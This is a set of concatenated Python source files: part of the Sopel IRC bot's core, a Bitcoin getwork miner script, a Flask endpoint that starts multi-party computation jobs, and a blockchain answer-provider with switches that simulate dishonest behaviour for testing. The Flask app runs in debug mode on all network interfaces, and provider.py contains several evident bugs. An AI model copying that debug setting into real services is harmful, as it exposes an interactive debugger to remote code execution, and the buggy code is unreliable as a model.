"%s prevented from using %s in %s due to global limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, globaltimediff,
func.global_rate
)
return
if not trigger.is_privmsg and func in self._times[trigger.sender]:
chantimediff = current_time - self._times[trigger.sender][func]
if func.channel_rate > 0 and chantimediff < func.channel_rate:
LOGGER.info(
"%s prevented from using %s in %s due to channel limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, chantimediff,
func.channel_rate
)
return
# if channel has its own config section, check for excluded modules/modules methods
if trigger.sender in self.config:
channel_config = self.config[trigger.sender]
# disable listed modules completely on provided channel
if 'disable_modules' in channel_config:
disabled_modules = channel_config.disable_modules.split(',')
# if "*" is used, we are disabling all modules on provided channel
if '*' in disabled_modules:
return
if func.__module__ in disabled_modules:
return
# disable chosen methods from modules
if 'disable_commands' in channel_config:
disabled_commands = literal_eval(channel_config.disable_commands)
if func.__module__ in disabled_commands:
if func.__name__ in disabled_commands[func.__module__]:
return
try:
exit_code = func(sopel, trigger)
except Exception: # TODO: Be specific
exit_code = None
self.error(trigger)
if exit_code != NOLIMIT:
self._times[nick][func] = current_time
self._times[self.nick][func] = current_time
if not trigger.is_privmsg:
self._times[trigger.sender][func] = current_time
def dispatch(self, pretrigger):
args = pretrigger.args
event, args, text = pretrigger.event, args, args[-1] if args else ''
if self.config.core.nick_blocks or self.config.core.host_blocks:
nick_blocked = self._nick_blocked(pretrigger.nick)
host_blocked = self._host_blocked(pretrigger.host)
else:
nick_blocked = host_blocked = None
list_of_blocked_functions = []
for priority in ('high', 'medium', 'low'):
items = self._callables[priority].items()
for regexp, funcs in items:
match = regexp.match(text)
if not match:
continue
user_obj = self.users.get(pretrigger.nick)
account = user_obj.account if user_obj else None
trigger = Trigger(self.config, pretrigger, match, account)
wrapper = SopelWrapper(self, trigger)
for func in funcs:
if (not trigger.admin and
not func.unblockable and
(nick_blocked or host_blocked)):
function_name = "%s.%s" % (
func.__module__, func.__name__
)
list_of_blocked_functions.append(function_name)
continue
if event not in func.event:
continue
if hasattr(func, 'intents'):
if not trigger.tags.get('intent'):
continue
match = False
for intent in func.intents:
if intent.match(trigger.tags.get('intent')):
match = True
if not match:
continue
if (trigger.nick.lower() == self.nick.lower() and
not func.echo):
continue
if func.thread:
targs = (func, wrapper, trigger)
t = threading.Thread(target=self.call, args=targs)
t.start()
else:
self.call(func, wrapper, trigger)
if list_of_blocked_functions:
if nick_blocked and host_blocked:
block_type = 'both'
elif nick_blocked:
block_type = 'nick'
else:
block_type = 'host'
LOGGER.info(
"[%s]%s prevented from using %s.",
block_type,
trigger.nick,
', '.join(list_of_blocked_functions)
)
def _host_blocked(self, host):
bad_masks = self.config.core.host_blocks
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
def _nick_blocked(self, nick):
bad_nicks = self.config.core.nick_blocks
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
stderr(
'Calling shutdown for %d modules.' % (len(self.shutdown_methods),)
)
for shutdown_method in self.shutdown_methods:
try:
stderr(
"calling %s.%s" % (
shutdown_method.__module__, shutdown_method.__name__,
)
)
shutdown_method(self)
except Exception as e:
stderr(
"Error calling shutdown method for module %s:%s" % (
shutdown_method.__module__, e
)
)
# Avoid calling shutdown methods if we already have.
self.shutdown_methods = []
def cap_req(self, module_name, capability, arg=None, failure_callback=None,
success_callback=None):
"""Tell Sopel to request a capability when it starts.
By prefixing the capability with `-`, it will be ensured that the
capability is not enabled. Simmilarly, by prefixing the capability with
`=`, it will be ensured that the capability is enabled. Requiring and
disabling is "first come, first served"; if one module requires a
capability, and another prohibits it, this function will raise an
exception in whichever module loads second. An exception will also be
raised if the module is being loaded after the bot has already started,
and the request would change the set of enabled capabilities.
If the capability is not prefixed, and no other module prohibits it, it
will be requested. Otherwise, it will not be requested. Since
capability requests that are not mandatory may be rejected by the
server, as well as by other modules, a module which makes such a
request should account for that possibility.
The actual capability request to the server is handled after the
completion of this function. In the event that the server denies a
request, the `failure_callback` function will be called, if provided.
The arguments will be a `Sopel` object, and the capability which was
rejected. This can be used to disable callables which rely on the
capability. It will be be called either if the server NAKs the request,
or if the server enabled it and later DELs it.
The `success_callback` function will be called upon acknowledgement of
the capability from the server, whether during the initial capability
negotiation, or later.
If ``arg`` is given, and does not exactly match what the server
provides or what other modules have requested for that capability, it is
considered a conflict.
"""
# TODO raise better exceptions
cap = capability[1:]
prefix = capability[0]
entry = self._cap_reqs.get(cap, [])
if any((ent.arg != arg for ent in entry)):
raise Exception('Capability conflict')
if prefix == '-':
if self.connection_registered and cap in self.enabled_capabilities:
raise Exception('Can not change capabilities after server '
'connection has been completed.')
if any((ent.prefix != '-' for ent in entry)):
raise Exception('Capability conflict')
entry.append(_CapReq(prefix, module_name, failure_callback, arg,
success_callback))
self._cap_reqs[cap] = entry
else:
if prefix != '=':
cap = capability
prefix = ''
if self.connection_registered and (cap not in
self.enabled_capabilities):
raise Exception('Can not change capabilities after server '
'connection has been completed.')
# Non-mandatory will callback at the same time as if the server
# rejected it.
if any((ent.prefix == '-' for ent in entry)) and prefix == '=':
raise Exception('Capability conflict')
entry.append(_CapReq(prefix, module_name, failure_callback, arg,
success_callback))
self._cap_reqs[cap] = entry
def register_url_callback(self, pattern, callback):
"""Register a ``callback`` for URLs matching the regex ``pattern``
:param pattern: compiled regex pattern to register
:param callback: callable object to handle matching URLs
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``setup()``::
if not bot.memory.contains('url_callbacks'):
bot.memory['url_callbacks'] = tools.SopelMemory()
regex = re.compile(r'http://example.com/path/.*')
bot.memory['url_callbacks'][regex] = callback
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.register_url_callback(regex, callback)
"""
if not self.memory.contains('url_callbacks'):
self.memory['url_callbacks'] = tools.SopelMemory()
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.memory['url_callbacks'][pattern] = callback
def unregister_url_callback(self, pattern):
"""Unregister the callback for URLs matching the regex ``pattern``
:param pattern: compiled regex pattern to unregister callback
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``shutdown()``::
regex = re.compile(r'http://example.com/path/.*')
try:
del bot.memory['url_callbacks'][regex]
except KeyError:
pass
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.unregister_url_callback(regex)
"""
if not self.memory.contains('url_callbacks'):
# nothing to unregister
return
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
try:
del self.memory['url_callbacks'][pattern]
except KeyError:
pass
def search_url_callbacks(self, url):
"""Yield callbacks found for ``url`` matching their regex pattern
:param str url: URL found in a trigger
:return: yield 2-value tuples of ``(callback, match)``
For each pattern that matches the ``url`` parameter, it yields a
2-value tuple of ``(callable, match)`` for that pattern.
The ``callable`` is the one registered with
:meth:`register_url_callback`, and the ``match`` is the result of
the regex pattern's ``search`` method.
.. versionadded:: 7.0
.. seealso::
The Python documentation for the `re.search`__ function and
the `match object`__.
.. __: https://docs.python.org/3.6/library/re.html#re.search
.. __: https://docs.python.org/3.6/library/re.html#match-objects
"""
for regex, function in tools.iteritems(self.memory['url_callbacks']):
match = regex.search(url)
if match:
yield function, match
class SopelWrapper(object):
def __init__(self, sopel, trigger):
# The custom __setattr__ for this class sets the attribute on the
# original bot object. We don't want that for these, so we set them
# with the normal __setattr__.
object.__setattr__(self, '_bot', sopel)
object.__setattr__(self, '_trigger', trigger)
def __dir__(self):
classattrs = [attr for attr in self.__class__.__dict__
if not attr.startswith('__')]
return list(self.__dict__) + classattrs + dir(self._bot)
def __getattr__(self, attr):
return getattr(self._bot, attr)
def __setattr__(self, attr, value):
return setattr(self._bot, attr, value)
def say(self, message, destination=None, max_messages=1):
if destination is None:
destination = self._trigger.sender
self._bot.say(message, destination, max_messages)
def action(self, message, destination=None):
if destination is None:
destination = self._trigger.sender
self._bot.action(message, destination)
def notice(self, message, destination=None):
if destination is None:
destination = self._trigger.sender
self._bot.notice(message, destination)
def reply(self, message, destination=None, reply_to=None, notice=False):
if destination is None:
destination = self._trigger.sender
if reply_to is None:
reply_to = self._trigger.nick
self._bot.reply(message, destination, reply_to, notice)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 13801
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
player.py
|
from time import sleep
from flask import Flask, jsonify
from flask_restful import Resource, Api
from multiprocessing import Process
from player_auxilliary import generate_and_compile, run_smpc_computation
import json
import argparse
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument(
'player_id',
metavar='id',
type=int,
nargs=1,
help='Specify player Id'
)
args = parser.parse_args()
player_id = args.player_id[0]
app = Flask(__name__)
api = Api(app)
class TriggerComputation(Resource):
def get(self, jobId, clients, datasetSize):
try:
generate_and_compile(str(clients), datasetSize)
p = Process(target=run_smpc_computation, args=(player_id, str(clients), jobId,))
p.start()
sleep(0.5)
if p.exitcode == 0:
raise ValueError
return 200
except Exception as e:
print(e)
return 500
class Ping(Resource):
def get(self):
return 200
api.add_resource(Ping, '/api/ping')
api.add_resource(TriggerComputation, '/api/job-id/<jobId>/clients/<clients>/dataset-size/<datasetSize>')
if __name__ == '__main__':
app.run(debug=True, port=7100+player_id, host="0.0.0.0")
|
provider.py
|
import web3
import time
import eth_account.messages
import web3.contract
import sys
import socket
from threading import Thread, Lock
from lib import *
from Simple import *
from SimpleValidator import *
import json
from lib import w3
import traceback
HOST = '127.0.0.1' # Standard loopback interface address (localhost)
PORT = 29290 # Port to listen on (non-privileged ports are > 1023)
class ProviderInterface: # This class is intended for the provider to interact with the blockchain.
# It doesn't do any computing itself, and doesn't interact with the customers.
def __init__(self, address, _max_queries=0):
validator_address = Solver.init_validator(address)
self.provider = Provider(address, validator_address)
self._terminate = False
self.customers = []
self.unsolved_questions = {}
self.unsolved_stack = []
self.solved_questions = {}
self.done_questions = {}
self.urgent = []
self.latest_signature = None
self.latest_hashes = []
self.latest_unanswered = 0
self.customers_demanded = []
self.latest_ack = dict()
self.acks = dict()
self.max_queries = _max_queries
def get_active_customers(self):
customers = []
for c in self.provider.get_customers():
if self.provider.is_subscription_active(c):
customers.append(c)
return customers
def check_signature(self, customer_address, ack):
questions_hashes, unanswered, signature = ack.get_all()
return Signer.check_sig(questions_hashes, unanswered, self.provider.get_contract_address(customer_address), signature, customer_address)
def demand_signature(self, customer_address, question, answer):
#questions_hashes, unanswered, signature = [], 0, 0
if customer_address in self.customers_demanded:
print(shorten_addr(customer_address), "Tried demanding signature - but already demanding.")
return False
ack = self.latest_ack[customer_address]
if ack is None:
print(shorten_addr(customer_address), "Tried demanding signature - no valid ack.")
return False
self.customers_demanded.append(customer_address)
questions_hashes, unanswered, signature = ack.get_all()
demanded = self.provider.demand_signature(customer_address, question, questions_hashes, unanswered, signature, answer)
if demanded:
print(shorten_addr(customer_address), "Demanded signature.")
else:
print(shorten_addr(customer_address), "Tried demanding signature - failed.")
return demanded
def demand_all(self):
demanded = []
for address in self.get_active_customers():
if address in self.customers_demanded:
continue
if self.latest_ack[address] is not None and 0 < len(self.solved_questions[address].keys()):
qa = self.solved_questions[address][list(self.solved_questions[address].keys())[0]]
if self.demand_signature(address, qa.get_question(), qa.get_answer()):
demanded.append(address)
return demanded
def exec_demands(self):
to_remove = []
for address in self.customers_demanded:
closed = self.provider.exec_demand(address)
if closed:
to_remove.append(address)
for address in to_remove:
self.customers_demanded.remove(address)
return to_remove
def check_demands(self):
to_remove = []
for address in self.customers_demanded:
ret = self.provider.check_demand(address)
if ret is not None:
hashes, unanswered, signature = ret
closed = self.register_ack(address, Ack(hashes, unanswered, signature))
if closed is not None:
for q in closed:
print(shorten_addr(address), "Got new answer ack:", Coder.str_question(q))
to_remove.append(address)
for address in to_remove:
self.customers_demanded.remove(address)
return to_remove
def get_different_ack(self, customer_address, ack):
if not self.check_signature(customer_address, ack):
return None
for ack2 in self.acks[customer_address]:
if ack.is_different(ack2):
return ack2
self.acks[customer_address].append(ack)
return None
def register_ack(self, customer_address, ack):
#print(customer_address, hashes, unanswered, signature)
if len(ack.get_hashes()) < 0:
return None
if not self.check_signature(customer_address, ack):
return None
if ack.is_newer_than(self.latest_ack[customer_address]):
self.latest_ack[customer_address] = ack
to_close = []
for h in ack.get_answered_hashes():
if h in self.solved_questions[customer_address]:
to_close.append(self.solved_questions[customer_address][h].get_question())
if h in self.unsolved_questions[customer_address]:
to_close.append(self.solved_questions[customer_address][h].get_question())
for q in to_close:
self.close_question(customer_address, q)
return to_close
elif ack.is_different(self.latest_ack[customer_address]):
self.acks[customer_address].append(ack)
return None
def set_urgent(self, appeals):
self.urgent = appeals
def get_urgent(self):
return self.urgent
def get_next_question(self):
if len(self.unsolved_stack) < 1:
return None
return self.unsolved_stack[0]
def create_subscription(self, customer_address):
self.customers.append(customer_address)
self.unsolved_questions[customer_address] = dict()
self.solved_questions[customer_address] = dict()
self.done_questions[customer_address] = dict()
self.acks[customer_address] = dict()
self.latest_ack[customer_address] = None
return self.provider.create_subscription(customer_address)
def register_question(self, customer_address, question):
if not self.provider.get_validator().is_valid_question(question):
return False
qa = QA(question, asker = customer_address)
self.unsolved_questions[customer_address][qa.get_hash()] = qa
self.unsolved_stack.append(qa)
return True
def register_answer(self, customer_address, question, answer):
q_hash = Signer.hash(question)
qa = None
if q_hash in self.unsolved_questions[customer_address]:
qa = self.unsolved_questions[customer_address][q_hash]
self.unsolved_stack.remove(qa)
qa.set_answer(answer)
del self.unsolved_questions[customer_address][q_hash]
if qa is None:
qa = QA(question, asker=customer_address, answer=answer)
self.solved_questions[customer_address][q_hash] = qa
def close_question(self, customer_address, question):
q_hash = Signer.hash(question)
qa = None
if q_hash in self.unsolved_questions[customer_address]:
qa = self.unsolved_questions[customer_address][q_hash]
self.unsolved_stack.remove(qa)
del self.unsolved_questions[customer_address][q_hash]
if q_hash in self.solved_questions[customer_address]:
qa = self.solved_questions[customer_address][q_hash]
del self.solved_questions[customer_address][q_hash]
if qa is None:
qa = QA(question, asker=customer_address)
self.done_questions[customer_address][q_hash] = qa
def get_new_answers(self, customer_address, close=True):
return self.solved_questions[customer_address].values()
def is_subscription_active(self, customer_address):
return self.provider.is_subscription_active(customer_address)
def is_appealing(self, customer_address):
return self.provider.check_for_appeal(customer_address) is not None
def get_answer(self, customer_address, question):
q_hash = Signer.hash(question)
answer = None
if q_hash in self.solved_questions[customer_address]:
answer = self.solved_questions[customer_address][q_hash].get_answer()
elif q_hash in self.done_questions[customer_address]:
answer = self.done_questions[customer_address][q_hash].get_answer()
return answer
def check_for_appeals(self):
# returns None or a question appealed by the specified customer
appeals = []
for address in self.get_active_customers():
appeal = self.provider.check_for_appeal(address)
if(appeal is not None):
appeals.append(appeal)
closed = self.register_ack(address, appeal.get_ack())
if not closed is None:
for q in closed:
print(shorten_addr(customer_address), "Got new answer ack:", Coder.str_question(q))
return appeals
def resolve_appeal(self, customer_address, appeal):
# submit answer to resolve appeal by the specified customer
if self.overflow(customer_address):
print(shorten_addr(customer_address), "dismissed appeal - max queries met")
return True
question = appeal.get_question()
q_hash = Signer.hash(question)
answer = self.get_answer(customer_address, question)
if answer is not None:
self.provider.resolve_appeal(customer_address, answer)
return True
if q_hash not in self.unsolved_questions[customer_address]:
self.register_question(customer_address, question)
return False
def can_overflow(self, customer_address):
if self.latest_ack[customer_address] is None:
return False
if self.max_queries == 0:
return False
questions_hashes, unanswered, signature = self.latest_ack[customer_address].get_all()
if len(questions_hashes) - unanswered <= MAX_QUERIES:
return False
return True
def overflow(self, customer_address):
if not self.can_overflow(customer_address):
return False
questions_hashes, unanswered, signature = self.latest_ack[customer_address].get_all()
try:
self.provider.overflow(customer_address, questions_hashes, unanswered, signature)
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
return False
print(shorten_addr(customer_address), "Overflow: closed contract")
return True
def withdraw(self, customer_address):
# withdraws money from the subscription of the specified customer
return self.provider.withdraw(customer_address)
def withdraw_all(self):
amount = 0
# withdraws money from the subscription of the specified customer
for customer_address in self.provider.get_customers():
amount += self.withdraw(customer_address)
return amount
def terminate(self):
self._terminate = True
def terminated(self):
return self._terminate
def shorten_addr(addr):
s = str(addr)
if len(s) < 8:
s += "-"*(8-len(s))
return "[" + s[:7] + "]"
def init_provider(address, host, port):
provider_int = None
# Get Behavior of Provider from user
PROVIDER_APPEAL_ONLY = True
PROVIDER_WAIT_APPEAL = False
PROVIDER_DROP_APPEAL = False
PROVIDER_WRONG_ANSWER = False
PROVIDER_IMMIDIEATE_DEMAND = False
STOP_ON_MAX = False
value = input("Should the provider send answers? (y/n):")
if value == "y":
PROVIDER_APPEAL_ONLY = False
value = input("Should the provider wait for the last minute with appeals? (y/n):")
if value == "y":
PROVIDER_WAIT_APPEAL = True
value = input("Should the provider drop appeals? (y/n):")
if value == "y":
PROVIDER_DROP_APPEAL = True
value = input("Should the provider provide wrong answers (in appeals also)? (y/n):")
if value == "y":
PROVIDER_WRONG_ANSWER = True
value = input("Should the provider demand a signature for every answer? (y/n):")
if value == "y":
PROVIDER_IMMIDIEATE_DEMAND = True
value = input("Should the provider stop answering when max queries met? (y/n):")
if value == "y":
STOP_ON_MAX = True
global MAX_QUERIES
if not STOP_ON_MAX:
MAX_QUERIES = 0
# Create all threads
provider_int = ProviderInterface(address, MAX_QUERIES)
provider_lock = Lock()
to_join = []
x = Thread(target=handle_appeals_provider, args=(provider_lock, provider_int, PROVIDER_WAIT_APPEAL, PROVIDER_DROP_APPEAL))
x.start()
to_join.append(x)
x = Thread(target=solve_provider, args=(provider_lock, provider_int, Solver.solve, PROVIDER_WRONG_ANSWER, PROVIDER_IMMIDIEATE_DEMAND))
x.start()
to_join.append(x)
x = Thread(target=handle_input_provider, args=(provider_lock, provider_int))
x.start()
to_join.append(x)
# Receive connections
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((host, port))
s.listen()
print("[x] Started listening: ", (host, port))
s.settimeout(1)
while True:
try:
conn, addr = s.accept()
except socket.timeout:
terminated = False
provider_lock.acquire()
try:
terminated = provider_int.terminated()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if(terminated):
break
else:
x = Thread(target=provider_handle_client, args=(provider_lock, provider_int, conn, addr, PROVIDER_APPEAL_ONLY, STOP_ON_MAX))
x.start()
to_join.append(x)
for x in to_join:
x.join()
s.close()
print("[x] Closing server")
def handle_appeals_provider(provider_lock, provider_int, PROVIDER_WAIT_APPEAL, PROVIDER_DROP_APPEAL):
#main logic of provider
while(True):
#Check if provider terminated
terminated = False
provider_lock.acquire()
try:
terminated = provider_int.terminated()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if(terminated):
print("[x] Closing appeals provider")
return
time.sleep(0.1)
# Check for all appeals
appeals = []
provider_lock.acquire()
try:
appeals = provider_int.check_for_appeals()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if PROVIDER_DROP_APPEAL:
appeals = []
# Resolve every appeal if able
unresolved = []
for appeal in appeals:
customer_address = appeal.get_customer_address()
deadline_block, question = appeal.get_end_of_service_block(), appeal.get_question()
if PROVIDER_WAIT_APPEAL and w3.eth.blockNumber < deadline_block - 2:
continue
provider_lock.acquire()
try:
resolved = provider_int.resolve_appeal(customer_address, appeal)
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
print(shorten_addr(customer_address), "Couldn't resolve appeal! Is answer incorrect?")
finally:
provider_lock.release()
if resolved:
print(shorten_addr(customer_address), "Resolved appeal")
else:
print(shorten_addr(customer_address), "Appealed an unsent question")
unresolved.append(appeal)
# Set unresolved appeals to urgent
provider_lock.acquire()
try:
resolved = provider_int.set_urgent(unresolved)
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
# Check for status of demands
solved = []
provider_lock.acquire()
try:
solved = provider_int.check_demands()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
for address in solved:
print(shorten_addr(address), "Has resolved the signature demand")
# Execute unresolved timed demands
solved = []
provider_lock.acquire()
try:
solved = provider_int.exec_demands()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
for address in solved:
print(shorten_addr(address), "Channel closed - demand not resolved")
# Try withdrawing funds
if w3.eth.blockNumber % 10 == 0:
amount = 0
provider_lock.acquire()
try:
amount = provider_int.withdraw_all()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if amount > 0:
print("Withdrew funds:", amount)
def solve_provider(provider_lock, provider_int, solver, PROVIDER_WRONG_ANSWER, PROVIDER_IMMIDIEATE_DEMAND):
solved_counter = 0
while True:
# Check if Provider terminated
terminated = False
provider_lock.acquire()
try:
terminated = provider_int.terminated()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if(terminated):
print("[x] Closing solve provider")
return
time.sleep(0.1)
# Get Urgent to Solve
urgent = []
question = None
customer_address = None
provider_lock.acquire()
try:
urgent = provider_int.get_urgent()
qa = provider_int.get_next_question()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if qa is not None:
customer_address = qa.get_asker()
question = qa.get_question()
# Get most Urgent Question
if len(urgent) > 0:
closest = urgent[0].get_end_of_service_block()
for appeal in urgent:
add = appeal.get_customer_address()
deadline_block, q = appeal.get_end_of_service_block(), appeal.get_question()
if deadline_block < closest:
customer_address = add
question = q
closest = deadline_block
# Sleep if no question to solve
if question is None:
time.sleep(0.5)
continue
# Solve most recent or urgent
answer = solver(question, wrong=PROVIDER_WRONG_ANSWER)
print(shorten_addr(customer_address), "Solved:", Coder.str_question(question), "->", Coder.str_answer(answer))
provider_lock.acquire()
try:
provider_int.register_answer(customer_address, question, answer)
if(PROVIDER_IMMIDIEATE_DEMAND):
provider_int.demand_signature(customer_address, question, answer)
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
def handle_input_provider(provider_lock, provider_int):
while(True):
value = input("")
if value == "q":
provider_lock.acquire()
try:
provider_int.terminate()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
print("[x] Closing input provider")
return
elif value == "demand":
ret = None
provider_lock.acquire()
try:
ret = provider_int.demand_all()
except Exception as e:
print("ERROR demand:",e)
finally:
provider_lock.release()
print("[x] Demanded", len(ret), "signatures")
for a in ret:
print(shorten_addr(a), "Demanded signature")
else:
print("[x] Unknown command:", value)
def provider_handle_client(provider_lock, provider_int, conn, addr, PROVIDER_APPEAL_ONLY, STOP_ON_MAX):
customer_address = 0x000000000
state = 0
with conn:
conn.settimeout(1)
print(shorten_addr(customer_address), "New Connection: ", addr)
state = 0
# Getting Address
while True:
terminated = False
provider_lock.acquire()
try:
terminated = provider_int.terminated()
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if(terminated):
conn.close()
print(shorten_addr(customer_address), "Closing connection", addr)
return
try:
msg = receive_dict(conn)
if msg is None:
break
except:
continue
# get next message
if state == 0:
#print(addr, "Received: " + str(msg))
if not msg:
print(addr, "ERROR: connection ended?")
return
if "type" in msg and msg["type"] == "address" and "address" in msg:
customer_address = msg["address"]
print(shorten_addr(customer_address), "Got Address. (" + str(addr) + ")")
# Creating contract and sending it:
sub_add = None
provider_lock.acquire()
try:
sub_add = provider_int.create_subscription(customer_address)
except Exception as e:
traceback.print_tb(e.__traceback__)
print("ERROR:",e)
finally:
provider_lock.release()
if not sub_add:
print(shorten_addr(customer_address), "No subscription address! Returning.")
return
print(shorten_addr(customer_address), "Sending subscription...")
send_dict(conn,{
"type": "subscription",
"address": sub_add
})
state = 1
print(shorten_addr(customer_address), "Waiting for msg")
continue
